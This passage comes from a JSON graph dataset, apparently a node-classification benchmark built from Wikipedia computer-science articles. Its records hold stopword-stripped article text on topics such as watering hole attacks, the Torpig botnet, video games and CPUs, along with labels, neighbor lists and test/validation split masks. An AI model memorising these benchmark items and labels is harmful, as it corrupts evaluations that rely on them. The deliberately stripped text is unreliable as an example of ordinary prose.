dashboards help drawers grid customisation september 2017 company announced compliance european union general data protection regulation gdpr phased roll-out gdpr compliance features email marketing module february 2018 launched set gdpr compliance tools allowing users email marketing module collect consent digital marketing communications company headquartered petersfield hampshire united kingdom january 2008 company opened first overseas office sydney australia four really simple systems crm pricing plans product consists three modules really simple systems crm delivered software service application version 5 product written using lamp stack version 4 previous versions used microsoft technology javascript used client current version uses html5 responsive design deliver cross-platform availability applications runs two geographically dispersed datacentres automated failover achieve 99.999 uptime",
    "neighbors": [
      4194,
      1765,
      3462,
      6281,
      9901,
      3323,
      467,
      3450,
      1083
    ],
    "mask": "Test"
  },
  {
    "node_id": 971,
    "label": 4,
    "text": "Watering_hole_attack:watering hole attack watering hole computer attack strategy victim particular group organization industry region attack attacker guesses observes websites group often uses infects one malware eventually member targeted group becomes infected hacks looking specific information may attack users coming specific ip address also makes hacks harder detect research name derived predators natural world wait opportunity attack prey near watering holes websites often infected zero-day vulnerabilities browsers software defense known vulnerabilities apply latest software patches remove vulnerability allowed site infected assisted users ensure software running latest version additional defense companies monitor websites networks block traffic malicious content detected country-level watering-hole attack china late 2017 march 2018 group luckymouse also known iron tiger emissarypanda apt 27 threat group-3390 organization-level watering-hole attack montreal 2016-2017 unknown entity causing data breach august september 2017 installation binary ccleaner distributed vendor download servers included malware ccleaner popular tool used clean potentially unwanted files windows computers widely used security-minded users distributed installer binaries signed developer certificate making likely attacker compromised development build environment used insert malware june 2017 notpetya also known expetr malware believed originated ukraine compromised ukrainian government website attack vector users site downloading malware erases contents victims hard drives late 2016 polish bank discovered malware computers belonging institution believed source malware web server polish financial supervision authority reports financial losses result hack early 2013 attackers used united states department labor website gather information users information attack specifically targeted users visiting pages nuclear-related content december 2012 council foreign relations website found infected malware zero-day vulnerability microsoft internet explorer attack malware deployed users using internet explorer set english chinese japanese korean russian",
    "neighbors": [
      225,
      5665,
      3944,
      10348,
      7515
    ],
    "mask": "Validation"
  },
  {
    "node_id": 972,
    "label": 3,
    "text": "Aaargh!:aaargh aaargh single-player action video game player controls giant monster goal obtaining eggs destroying buildings different cities across lost island designed mastertronic arcadia systems arcade machine based custom hardware amiga released 1987 ported range platforms released across 1988 1989 electronic arts distributed amiga version game goal game find golden dragon egg player controls one two monsters must destroy buildings order find roc eggs discovery triggers fight rival monster five eggs found two monsters fight volcano claim dragon egg game action game fighting game elements player chooses play either dragon-like lizard ogre depicted cyclops game character player select becomes player rival obtain egg arcade version game either one two players could play simultaneously whereas ports one player could play time gameplay takes place across ten cities lost island representing different era civilisation ancient egypt wild west comprising one level game city represented single static playing area uses form 2.5d projection order give impression depth screen game received mixed reviews gaming magazines across platforms ported scores ranging around 2/10 equivalent almost 9/10 reviewers praised graphics sound particularly amiga port criticised gameplay ace magazine said although game good graphics atmospheric sound good gameplay enough challenge game players would want spend much time playing game know beat easily zx spectrum reviewers unimpressed fact game required levels loaded individually sinclair magazine describing multi-level multi-load beat 'em blowtorch 'em 'll screaming title time die reload game reviewed 1989 dragon 141 patricia hartley kirk lesser role computers column reviewers normally assign rating game ranging 1 5 stars disliked game much ranked x instead",
    "neighbors": [
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 973,
    "label": 3,
    "text": "Indiana_Jones_and_the_Temple_of_Doom_(1985_video_game):indiana jones temple doom 1985 video game indiana jones temple doom 1985 action arcade game developed published atari games based 1984 film name second film indiana jones franchise also first atari system 1 arcade game include digitized speech including voice clips harrison ford indiana jones amrish puri mola ram well john williams music film player assumes role indiana jones infiltrates lair evil thuggee cult armed trademark whip controls consist eight-position joystick button use whip player ultimate goal free children cult kidnapped slaves recover stolen relics known sankara stones escape temple defeat cult leader mola ram selecting one three difficulty levels player progresses three stages based different scenes film one life lost whenever indy touches hazard enemy character falls great height crashes mine cart falls lava whip used destroy stun enemies swing across gaps mines cycle repeats four times adding hazards time fourth repetition altar scene replaced final confrontation mola ram rope bridge river player completes scene mola ram falls death player advances bonus stage mines picking golden statues extra points stage continues remaining lives lost ports game later developed paragon programming released u.s. gold amstrad cpc commodore 64 msx zx spectrum 1987 game went number 2 uk sales charts behind renegade year mindscape ported atari st commodore 64 different compared u.s. gold version 1989 mindscape ported commodore amiga personal computers use ms-dos nes version ported tengen december 1988 apple // version ported papyrus design group june 1989 tengen computer video games reviewing zx spectrum amstrad cpc atari st versions called game quite accurate splendid conversion particularly atari st version magazine praised game playability criticized difficulty sound effects jonathan sutyak allgame gave commodore 64 version one half stars five called game major disappointment sutyak criticized gameplay terrible controls wrote graphically game mess game brown gray unappealing ... sounds great either bit better graphics theme music plays background best part game sound effects sharp enough exist indiana jones temple doom bad game way around looks bad bad controls way short",
    "neighbors": [
      1776,
      9166,
      9006,
      10679
    ],
    "mask": "Validation"
  },
  {
    "node_id": 974,
    "label": 1,
    "text": "InterSystems_Caché:intersystems caché intersystems caché commercial operational database management system intersystems used develop software applications healthcare management banking financial services government sectors customer software use database object sql code caché also allows developers directly manipulate underlying data structures hierarchical arrays known technology internally caché stores data multidimensional arrays capable carrying hierarchically structured data “ global ” data structures used mumps programming language influenced design caché similar used multivalue also known pick systems applications however object and/or sql access methods used caché objectscript caché basic t-sql used develop application business logic external interfaces include native object binding c++ java ejb activex .net caché supports jdbc odbc relational access xml web services also supported caché server pages csp technology allows tag-based creation web applications generate dynamic web pages typically using data caché database caché also includes intersystems zen implementation ajax enables component-based development rich web applications intersystems founded 1979 commercialize mumps hierarchical databases launched caché 1997 flagship product time ceased development original mumps product line intersystems claims caché world ’ fastest object database however high performance achieved transactional operations significantly hierarchical nature database management system dbms used part hospital patient tracking electronic medical record medicine management systems products developed companies epic systems well vista system used u.s. department veteran affairs sungard includes caché addvantage asset management software finance industry customers banks telecommunications vendors bt group vodacom also use caché db-engines website ranked caché popular object-oriented dbms every month since march 2013 caché runs windows linux solaris hp-ux aix macos openvms platforms",
    "neighbors": [
      8201,
      6797,
      1304,
      6809,
      11683,
      7076,
      10020,
      5929,
      10026,
      10413,
      10286,
      7983,
      823,
      6993,
      6359,
      479,
      9828,
      9841,
      7412,
      3573,
      6395
    ],
    "mask": "Validation"
  },
  {
    "node_id": 975,
    "label": 2,
    "text": "Sabily:sabily sabily way discontinued linux distribution based ubuntu designed muslims originally named ubuntu muslim edition presented ubuntume development sabily active 2007 2011 sabily designed muslim users “ box ” arabic language support islamic software tools installed including prayer times tool qur'an study tool hijri calendar etc unity shell based gnome 3 sabily 11.10 unity 2d graphic cards without 3d capabilities unity shell became available sabily 11.04 badr dvd ubuntu classic desktop default desktop sabily 11.04 unity ubuntu 11.04 new applications badr islamic date zakat calc gufw desktopnova autokey recordmydesktop anki full version sabily comes box educational software codecs used media formats wisabi sabily 11.04 installer windows xp windows vista windows 7 based wubi sabily previously named ubuntu muslim edition ubuntume sabily following releasing cycle ubuntu ubuntu 9.04 changed sabily currently three versions sabily official host moment ultimate version useful mainly connected internet yet sabily versions provide online qur'an recitations sabily available live dvd booted host computer without installation wisabi installer install sabily hard disk within microsoft windows without involving risky formatting partitioning compared ubuntu zekr open platform quran study tool browsing researching quran recitations translations available download small version dvd available online recitations minbar indicates time muslims pray runs background tray icon plays athan call prayer prayer times minbar works main calculation methods muslim league default shafii hanafi muslims observe salat five times day minbar helps remind daily prayer times monajat application linux windows displays azkar messages runs background tray icon displays hadiths application application provided sabily community zakat calc application linux zakat calc helps muslims calculate zakat types gold silver stones jewels savings bank property loans business firms animals 2.5 agriculture 10 zakat calc included sabily free open source operating system designed muslims project os sabily calculate amount payment zakat used educational purpose public use project free created using gambas programming language runs linux zakat alms giving one five pillars islam giving 2.5 one possessions surplus wealth charity generally poor needy gnome nanny parental control easy way control long users kids computer ca n't access browsing web",
    "neighbors": [
      3841,
      8837,
      7435,
      6797,
      10127,
      2321,
      5397,
      3478,
      4887,
      10394,
      8476,
      673,
      3745,
      5410,
      10530,
      6393,
      9253,
      10149,
      11305,
      7854,
      7983,
      8112,
      2738,
      4790,
      823,
      439,
      56,
      59,
      7483,
      10860,
      3903,
      9324,
      4673,
      10687,
      3654,
      2375,
      4039,
      5962,
      5067,
      8907,
      6910,
      1107,
      1110,
      4951,
      9693,
      3550,
      5343,
      4192,
      6625,
      2914,
      7140,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      5356,
      7020,
      7534,
      2671,
      7920,
      8177,
      2930,
      499,
      1396,
      3189,
      5363,
      9074,
      9461,
      5369,
      9971,
      5755,
      11388,
      8957,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 976,
    "label": 9,
    "text": "Joe_Armstrong_(programmer):joe armstrong programmer joseph leslie armstrong 27 december 1950 – 20 april 2019 computer scientist working area fault-tolerant distributed systems best known author erlang programming language armstrong born bournemouth 1950 17 armstrong began programming fortran school district mainframe experience helped physics studies university college london debugged programs fellow students exchange beer working ericsson computer science lab helped develop erlang 1986 received ph.d. computer science royal institute technology kth stockholm sweden 2003 dissertation titled making reliable distributed systems presence software errors professor kth since 2014 died 20 april 2019 infection complicated pulmonary fibrosis peter seibel wrote originally physicist switched computer science ran money middle physics phd landed job researcher working donald michie—one founders field artificial intelligence britain michie lab armstrong exposed full range ai goodies becoming founding member british robotics association writing papers robotic vision funding ai dried result famous lighthill report back physics-related programming half decade first eiscat scientific association later swedish space corporation finally joining ericsson computer science lab invented erlang working ericsson 1986 joe armstrong one designers implementers erlang along robert virding mike williams 1986 armstrong developed erlang released open source 1998",
    "neighbors": [
      3960
    ],
    "mask": "Test"
  },
  {
    "node_id": 977,
    "label": 3,
    "text": "SSE3:sse3 sse3 streaming simd extensions 3 also known intel code name prescott new instructions pni third iteration sse instruction set ia-32 x86 architecture intel introduced sse3 early 2004 prescott revision pentium 4 cpu april 2005 amd introduced subset sse3 revision e venice san diego athlon 64 cpus earlier simd instruction sets x86 platform oldest newest mmx 3dnow developed amd supported intel processors sse sse2 sse3 contains 13 new instructions sse2 notable change capability work horizontally register opposed less strictly vertical operation previous sse instructions specifically instructions add subtract multiple values stored within single register added instructions used speed implementation number dsp 3d operations also new instruction convert floating point values integers without change global rounding mode thus avoiding costly pipeline stalls finally extension adds lddqu alternative misaligned integer vector load better performance netburst based platforms loads cross cacheline boundaries arithmetic aos array structures",
    "neighbors": [
      3586,
      4108,
      5649,
      2088,
      1085,
      7234,
      3142,
      8795,
      2655,
      1119,
      1122,
      7783,
      4204,
      1137,
      9337,
      4217,
      10375,
      4237,
      7313,
      6804,
      8855,
      9369,
      9391,
      2237,
      5309,
      6339,
      2764,
      5326,
      5844,
      725,
      9428,
      10985,
      5356,
      9964,
      5358,
      8944,
      3317,
      9976,
      5883,
      5380,
      2821,
      1798,
      8452,
      6924,
      4886,
      3352,
      9500,
      3883,
      8506,
      833,
      6978,
      5444,
      9541,
      11080,
      9582,
      1399,
      1915,
      10620,
      3459,
      9092,
      3973,
      6025,
      4491,
      9611,
      6038,
      9111,
      8120,
      8125,
      8126,
      6596,
      9157,
      1998,
      5073,
      2514,
      1000,
      7657,
      8680,
      8684,
      499,
      4603,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 978,
    "label": 2,
    "text": "Concise_Command_Language:concise command language concise command language ccl term used digital equipment corporation command-line interpreter user interface supplied several computing systems successor named digital command language dcl ccl provides user extensive set terminal commands first system include ccl dec pdp-10 pdp-6 monitor came simple set commands compile run fortran program one would pdp-10 ccl key improvements predecessor following table contains list ccl commands",
    "neighbors": [
      11075,
      8876,
      7983,
      6837,
      1750,
      8729,
      8474,
      7325
    ],
    "mask": "None"
  },
  {
    "node_id": 979,
    "label": 5,
    "text": "TCP_Port_Service_Multiplexer:tcp port service multiplexer tcp port service multiplexer tcpmux little-used internet protocol defined rfc 1078 specification describes multiplexing service may accessed network protocol contact one number available tcp services host single well-known port number specification tcpmux rfc 1078 deprecated 2016 rfc 7805 technical reasons lack use internet host may connect server supports tcpmux protocol tcp port 1 host sends name service required followed pair carriage return line feed characters crlf server replies '+ '- character optional message followed crlf case positive reply '+ protocol service requested started otherwise connection closed service also features reserved name help remote server receives message output multi-line message listing names supported services one service name per line enabling tcpmux server enables attacker easily find services running host either using help command requesting large number services effect port scanning host available services iteratively tcpmux allows someone use service accessing port number 1 protocol makes difficult apply traditional port-based firewall rules block access certain hosts specific services",
    "neighbors": [
      8386,
      10924,
      6993,
      2994,
      7031
    ],
    "mask": "Test"
  },
  {
    "node_id": 980,
    "label": 3,
    "text": "ARM_Cortex-A57:arm cortex-a57 arm cortex-a57 microarchitecture implementing armv8-a 64-bit instruction set designed arm holdings cortex-a57 out-of-order superscalar pipeline available sip core licensees design makes suitable integration sip cores e.g gpu display controller dsp image processor etc one die constituting system chip soc january 2014 amd announced opteron a1100 intended servers a1100 four eight cortex-a57 cores support 128 gib ddr3 ddr4 ram eight-lane pcie controller eight sata 6 gbit/s ports two 10gige ports a1100 series released january 2016 four eight core versions qualcomm first offering made available sampling q4 2014 snapdragon 810 contains four cortex-a57 four cortex-a53 cores big.little configuration samsung also provides cortex-a57-based soc first one exynos octa 5433 available sampling q4 2014 march 2015 nvidia released tegra x1 soc four a57 cores running maximum 2 ghz",
    "neighbors": [
      5645,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      8815,
      10361,
      638,
      644,
      9863,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      6815,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      6926,
      5417,
      810,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      398,
      1428,
      4508,
      10658,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      9685,
      9174,
      10199,
      2524,
      9182,
      10734,
      2549,
      1014,
      3575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 981,
    "label": 2,
    "text": "UXP/DS:uxp/ds uxp/ds discontinued unix operating system developed fujitsu line workstations network servers uxp/ds based system v release 4 svr4 targets fujitsu ds/90 7000 series computers well gp7000 series computers 1991 fujitsu announced ds/90 7000 series workstations servers powered sparc processors running uxp/ds operating system 1998 fujitsu new gp7000 series granpower 7000 divided three parts series represented previous systems running uxp/ds series represented new systems also running uxp/ds series f represented new systems running solaris operating system gp7000f running solaris became basis later lines fujitsu unix servers 1999 uxp/ds ds/90 7000 series one reference platforms common desktop environment cde 2000 fujitsu released new primepower line unix servers solaris available option operating system",
    "neighbors": [
      823,
      7983,
      9137,
      5363,
      2995,
      5492,
      1399,
      7483
    ],
    "mask": "Validation"
  },
  {
    "node_id": 982,
    "label": 7,
    "text": "Stratoscale:stratoscale stratoscale software company offering software-defined data center technology marketed term hyper-converged infrastructure cloud computing capabilities stratoscale combines compute storage networking hardware additional third party software stratoscale founded 2013 ariel maislos stratoscale headquartered israel offices herzliya haifa offices north america sunnyvale california boston massachusetts new york city new york stratoscale announced stratoscale symphony december 2015 selling channel partners stratoscale raised 70 million battery ventures bessemer venture partners intel capital cisco leslie ventures qualcomm ventures sandisk stratoscale symphony marketed software-defined data centers hyper-converged infrastructure software intended work customers hardware stratoscale symphony available subscription basis symphony suite may deployed commodity x86 servers provide amazon web services aws capability capacity augment legacy vmware 2016 stratoscale released symphony 3 stratoscale channel partners technology partners system partners channel partners consist resellers integrators distributors technology partners include cloudendure cloudera docker hortonworks intel mellanox technologies midokura openstack sandisk system partners adjust server configurations environments system partners include cisco hewlett packard enterprise hpe infinidat lenovo supermicro",
    "neighbors": [
      9344,
      4194,
      1638,
      10120,
      6153,
      6703,
      7248,
      6834,
      499,
      5332,
      2910
    ],
    "mask": "Train"
  },
  {
    "node_id": 983,
    "label": 3,
    "text": "Batman_(1986_video_game):batman 1986 video game batman 1986 3d isometric action-adventure game ocean software amstrad pcw amstrad cpc zx spectrum msx first batman game developed game received favourable reviews unrelated batman game released two years later titled object game rescue robin collecting seven parts batcraft hovercraft scattered around batcave gameplay takes place 3d isometric universe programmer jon ritman artist bernie drummond would develop 1987 head heels notable implementing early example save game system allows players restart intermediate point game loss lives rather returning way start case point batman collects batstone batman received well computer game press time crash gave rating 93 sinclair scored 9/10 sinclair user gave five stars rated classic game went number 2 uk sales charts behind world cup carnival freeware remake called watman produced pc 2000 dos game remake called gwatman also written game boy advance remake pc produced retrospec remake msx2 produced aamsx fx software msx ru 2014",
    "neighbors": [
      3074,
      5820,
      9006
    ],
    "mask": "Train"
  },
  {
    "node_id": 984,
    "label": 4,
    "text": "AFX_Windows_Rootkit_2003:afx windows rootkit 2003 afx windows rootkit 2003 user mode rootkit hides files processes registry installer rootkit executed installer creates files iexplore.dll explorer.dll system directory iexplore.dll injected explorer.exe explorer.dll injected running processes injected dlls hooks windows api functions hide files processes registry encyclopedia entry trojan win32/delf.m learn malware microsoft malware protection center",
    "neighbors": [
      2432,
      4423,
      5754,
      7515,
      9791
    ],
    "mask": "Test"
  },
  {
    "node_id": 985,
    "label": 2,
    "text": "JLIVECD:jlivecd jlivecd open source cli command line interface based live cd/dvd customization tool debian arch linux ubuntu family distributions linux mint derivatives host system restricted live cd/dvd system e.g arch linux live cd modified ubuntu host ubuntu live cd modified debian host etc. tool released gpl-2 primarily intended non-commercial use developed help documentation found livecdcustomization written ubuntu community debian/modify/cd debian wiki remastering install iso arch linux wiki one needs know customization methods make use tool customization prepares environment customization automates task creating customized live cd/dvd iso image base iso image needed customization brought upon resulting iso image burnt cd dvd bootable live usb also prepared use",
    "neighbors": [
      6634,
      5618,
      4637
    ],
    "mask": "Train"
  },
  {
    "node_id": 986,
    "label": 3,
    "text": "Columns_(video_game):columns video game columns one many samegame/tetris -like tile-matching puzzle games appear great success late 1980s area play enclosed within tall rectangular playing area columns three different symbols differently-colored jewels appear one time top well fall bottom landing either floor top previously-fallen columns column falling player move left right also cycle positions symbols within column lands three symbols connected horizontal vertical diagonal line symbols disappear pile columns settles gravity resettlement causes three symbols align disappear cycle repeats occasionally special column multicolor magic jewel appears destroys jewels color one underneath columns fall faster rate player progresses goal game play long possible well fills jewels ends game players score 99,999 points ports game offer alternate game modes well flash columns involves mining way set number lines get flashing jewel bottom doubles allows two players work together well time trial involves racking many points possible within time limit columns first pack-in game sega game gear version slightly different sega genesis version soundtrack transposed rearranged due limitations handheld sound chip columns updated genesis version overall decoration less like cartoon game gear version instead artistically designed lastly game gear version feature let player change jewels fruit squares dice card shapes clubs diamonds spades many sequels spin-offs produced columns ii voyage time columns iii revenge columns columns '97 1 2 many compilations re-releases columns arcade collection sega ages vol 07 columns well columns made sega versions made available master system genesis sega cd game gear saturn dreamcast additional versions game also made available pc engine game boy advance playstation 2 super famicom version released japan via nintendo power service game boy color version specifically called columns gb osamu tezuka characters featured many characters kimba astroboy also featured slightly less known characters unico november 7 2006 columns released part game sega genesis collection playstation 2 later another release compilation playstation portable december 4 2006 title released nintendo virtual console 800 wii points also included sonic ultimate genesis collection playstation 3 xbox 360 recently game ported ios sega columns also cloned many times across different platforms tokuhiko uwabo composed music columns song clotho named greek moira name related greek flavor game art main songs titled atropos lathesis sic moirai reviewing game appearance sega arcade classics sega cd glenn rubenstein gave b+ describing like tetris bit better mega placed game number 34 top mega drive games time",
    "neighbors": [
      10855,
      8937,
      3307,
      7916,
      5677,
      8300,
      10316,
      5011,
      10931,
      4152,
      11231
    ],
    "mask": "Test"
  },
  {
    "node_id": 987,
    "label": 9,
    "text": "Query_language:query language query languages data query languages dqls computer languages used make queries databases information systems broadly query languages classified according whether database query languages information retrieval query languages difference database query language attempts give factual answers factual questions information retrieval query language attempts find documents containing information relevant area inquiry examples include",
    "neighbors": [
      5632,
      8201,
      6161,
      10258,
      2068,
      6166,
      1049,
      5658,
      8735,
      9248,
      8742,
      10793,
      10286,
      4656,
      11324,
      8262,
      9286,
      72,
      2632,
      9290,
      8788,
      10326,
      3159,
      7767,
      11362,
      9828,
      10340,
      8808,
      2669,
      6775,
      2681,
      1146,
      3196,
      2688,
      3712,
      9345,
      10389,
      151,
      3230,
      4255,
      1697,
      11425,
      4263,
      10413,
      10927,
      5808,
      10418,
      9397,
      3768,
      7868,
      11457,
      6850,
      2246,
      9942,
      2780,
      734,
      10471,
      6383,
      7412,
      5880,
      9467,
      4354,
      8451,
      261,
      9481,
      10505,
      8979,
      6420,
      7446,
      10518,
      4376,
      11030,
      5403,
      7968,
      290,
      1314,
      7461,
      2344,
      305,
      9527,
      1341,
      4416,
      2369,
      5441,
      5953,
      10048,
      2374,
      8518,
      853,
      2901,
      10069,
      860,
      7523,
      9075,
      9079,
      5509,
      10632,
      6032,
      2456,
      9112,
      10137,
      2972,
      7582,
      9631,
      9634,
      1447,
      7080,
      5550,
      10672,
      8627,
      3004,
      9661,
      9663,
      4042,
      9177,
      987,
      479,
      6112,
      4065,
      9183,
      3556,
      6629,
      6124,
      2544,
      10737,
      3573,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 988,
    "label": 4,
    "text": "Torpig:torpig torpig also known anserin sinowal type botnet spread systems compromised mebroot rootkit variety trojan horses purpose collecting sensitive personal corporate data bank account credit card information targets computers use microsoft windows recruiting network zombies botnet torpig circumvents antivirus software use rootkit technology scans infected system credentials accounts passwords well potentially allowing attackers full access computer also purportedly capable modifying data computer perform man-in-the-browser attacks november 2008 estimated torpig stolen details 500,000 online bank accounts credit debit cards described one advanced pieces crimeware ever created torpig reportedly began development 2005 evolving point effectively evade detection host system antivirus software early 2009 team security researchers university california santa barbara took control botnet ten days time extracted unprecedented amount 70 gb stolen data redirected 1.2 million ips private command control server report goes great detail botnet operates ucsb research team ten-day takeover botnet torpig able retrieve login information 8,310 accounts 410 different institutions 1,660 unique credit debit card numbers victims u.s. 49 italy 12 spain 8 40 countries including cards visa 1,056 mastercard 447 american express 81 maestro 36 discover 24 initially great deal torpig spread attributable phishing emails tricked users installing malicious software sophisticated delivery methods developed since time use malicious banner ads take advantage exploits found outdated versions java adobe acrobat flash shockwave type drive-by download method typically require user click ad download may commence without visible indications malicious ad recognizes old software version redirects browser torpig download site complete installation infected computer master boot record mbr trojan restart computer main stage infection malware upload information computer twenty minutes time including financial data like credit card numbers credentials banking accounts well e-mail accounts windows passwords ftp credentials pop/smtp accounts",
    "neighbors": [
      3072,
      10756,
      3724,
      6797,
      3473,
      3347,
      4883,
      2325,
      278,
      9087,
      3867,
      9630,
      10657,
      3620,
      2213,
      4648,
      939,
      46,
      9909,
      10297,
      3643,
      1979,
      444,
      7739,
      7996,
      9664,
      9791,
      2114,
      9154,
      7364,
      8133,
      11583,
      10952,
      2508,
      81,
      8789,
      10457,
      7515,
      3807,
      8032,
      3555,
      3941,
      10477,
      4462,
      2041,
      10875,
      3581,
      5886,
      2175
    ],
    "mask": "None"
  },
  {
    "node_id": 989,
    "label": 9,
    "text": "Lisp_Machines:lisp machines lisp machines inc. company formed 1979 richard greenblatt mit artificial intelligence laboratory build lisp machines based cambridge massachusetts 1979 lisp machine project mit originated headed greenblatt constructed 30 cadr computers various projects mit russell noftsker formerly administrator mit artificial intelligence lab years previously since started run small company convinced computers based artificial intelligence language lisp bright future commercially number ready customers anxious get machines similar ones seen mit greenblatt noftsker differing ideas structure financing proposed company greenblatt believed company could bootstrapped i.e financed practically scratch order flow customers willing pay advance would mean principals company would retain control noftsker favored conventional venture capital model raising considerable sum money investors control company two negotiated length neither would compromise ensuing discussions choice rent lab two factions february 1979 matters came head greenblatt believed proceeds construction sale machines could profitably reinvested funding company sided noftsker believing commercial venture fund-backed company better chance surviving commercializing lisp machines greenblatt proposed self-sustaining start-up went start symbolics inc. alexander jacobson consultant cdc trying put together ai natural language computer application came greenblatt seeking lisp machine group work eight months greenblatt disastrous conference noftsker yet produce anything alexander jacobson decided way greenblatt going actually start company build lisp machines jacobson needed pushed financially helped greenblatt launch company jacobson pulled together business plans board partner f. stephen wyle greenblatt newfound company named lisp machine inc. lmi funded mostly order flow including cdc orders via jacobson following parable-like story told lmi steven levy used first time 1984 levy account hackers large part based values hackers mit artificial intelligence laboratory among hackers richard stallman levy time called last true hacker noftsker started symbolics able pay salaries n't actually building equipment programmers work bargained patrick winston exchange allowing symbolics staff keep working mit symbolics would let mit use internally freely software symbolics developed unfortunately openness would later lead accusations intellectual property theft late 1970s early 1980s prevent software used competitors computers manufacturers stopped distributing source code began using copyright restrictive software licenses limit prohibit copying redistribution proprietary software existed shift legal characteristics software regarded consequence triggered u.s copyright act 1976 stated mit fellow brewster kahle companies delivered proprietary software richard stallman believed lmi unlike symbolics tried avoid hurting lab stallman proclaimed prospect charging money software crime humanity clarified years later blocking user freedom believes crime act charging copy software symbolics recruited remaining mit hackers including notable hacker bill gosper left ai lab symbolics forced greenblatt also resign ai lab citing mit policies two years mit ai lab 1982 end 1983 stallman singlehandedly duplicated efforts symbolics programmers order prevent gaining monopoly lab computers although lmi able benefit stallman freely available code last hackers lab later programmers would sign non-disclosure agreements share source code technical information software developers lisp machines inc. sold first lisp machines designed mit lmi-cadr series internal battles symbolics began selling cadr mit lab lm-2 symbolics hindered noftsker promise give greenblatt year head start severe delays procuring venture capital symbolics still major advantage none ai lab hackers gone work greenblatt solid 14 signed onto symbolics two ai lab people choose employed either richard stallman marvin minsky symbolics ended producing around 100 lm-2s sold 70,000 companies developed second-generation products based cadr symbolics 3600 lmi-lambda lmi managed sell around 200 3600 shipped year late expanded cadr widening machine word 36-bits expanding address space 28-bits adding hardware accelerate certain common functions implemented microcode cadr lmi-lambda came year 3600 1983 mostly upward compatible cadr source cadr microcode fragments could reassembled improvements instruction fetch hardware differences including use multiplier chip faster logic family cache memory lambda processor cards designed work nubus based engineering workstation originated steve ward group mit separate chain events developed western digital corporation allowed popular lambda 2x2 configuration whereby two machines shared one infrastructure considerable savings texas instruments ti joined fray investing lmi ran money purchasing relocating nubus engineering workstation unit western digital licensing lmi-lambda design later producing variant ti explorer symbolics continued develop 3600 family operating system genera produced ivory vlsi chip implementation symbolics architecture texas instruments shrunk explorer silicon explorer ii later microexplorer lmi abandoned cadr architecture developed k-machine lmi went bankrupt 1987 machine could brought market lmi reincarnated gigamos systems greenblatt one officers gigamos ownership canadian backer named guy montpetit bought assets lmi chapter 11 bankruptcy reorganization prior incorporation gigamos lmi developed new lisp machine called k-machine used risc-like architecture montpetit subsequently became embroiled 1989 canadian political scandal side-effect resulted seizure assets gigamos rendering company unable meet payroll according richard stallman dispute lmi symbolics inspired stallman start software development gnu operating system january 1984 free software foundation fsf october 1985 forerunners open-source-software movement gnu/linux operating system",
    "neighbors": [
      4992,
      2179,
      7267,
      7173,
      6502,
      7048,
      7880,
      5519,
      80,
      5360,
      242,
      7983,
      10104,
      4981,
      9686,
      823,
      504,
      377
    ],
    "mask": "Test"
  },
  {
    "node_id": 990,
    "label": 7,
    "text": "Apache_CarbonData:apache carbondata apache carbondata free open-source column-oriented data storage format apache hadoop ecosystem similar columnar-storage file formats available hadoop namely rcfile orc compatible data processing frameworks hadoop environment provides efficient data compression encoding schemes enhanced performance handle complex data bulk carbondata first developed huawei 2013 project submitted apache incubator june 2016 first official release two months later project top honors blackduck 2016 open source rookies year big data category since may 1 2017 apache carbondata top-level apache software foundation asf -sponsored project",
    "neighbors": [
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      6943,
      3877,
      10661,
      11303,
      1327,
      7983,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      7767,
      8408,
      9179,
      7261,
      8799,
      10719,
      865,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      2163,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "None"
  },
  {
    "node_id": 991,
    "label": 4,
    "text": "William_Eldridge_Odom:william eldridge odom william eldridge odom june 23 1932 – may 30 2008 united states army lieutenant general served director national security agency president ronald reagan culminated 31-year career military intelligence mainly specializing matters relating soviet union retirement military became think tank policy expert university professor became known outspoken criticism iraq war warrantless wiretapping american citizens died apparent heart attack vacation home lincoln vermont early military career observed soviet military activities serving military liaison potsdam germany later taught courses russian history west point new york serving united states embassy moscow early 1970s visited republics union soviet socialist republics although constantly trailed kgb nonetheless managed smuggle large portion alexander solzhenitsyn archive including author membership card writers union second world war military citations solzhenitsyn subsequently paid tribute odom role memoir invisible allies 1995 upon returning united states resumed career west point taught courses soviet politics odom regularly stressed importance education military officers 1977 appointed military assistant zbigniew brzezinski hawkish assistant national security affairs president jimmy carter among primary issues focused american-soviet relations including salt nuclear weapons talks soviet invasion afghanistan iran hostage crisis presidential directives situation persian gulf terrorism hijackings executive order telecommunications policy 2 november 1981 12 may 1985 odom served army assistant chief staff intelligence 1985 1988 served director national security agency united states largest intelligence agency president ronald reagan odom senior fellow hudson institute specialized military issues intelligence international relations also adjunct professor yale university georgetown university taught seminar courses u.s. national security policy russian politics earned national reputation expert soviet military since 2005 argued u.s. interests would best served immediate withdrawal iraq called 2003 invasion worst strategic blunder history u.s. foreign policy also critical nsa warrantless wiretapping international calls said would n't happened watch odom also openly critical neocon influence decision go war pretty hard imagine us going iraq without strong lobbying efforts aipac nowiki /nowiki american israel public affairs committee nowiki /nowiki neocons think know good israel israel knows odom member military intelligence hall fame also member advisory council victims communism memorial foundation also published newspaper op-ed pieces new york times wall street journal washington post others",
    "neighbors": [
      6017,
      8726,
      1189,
      9517,
      1838,
      5308,
      1986,
      6343,
      6344,
      11335,
      7119,
      7759,
      7887,
      3154,
      8276,
      7893,
      7137,
      3305,
      7145,
      2419,
      6005,
      6136,
      766
    ],
    "mask": "None"
  },
  {
    "node_id": 992,
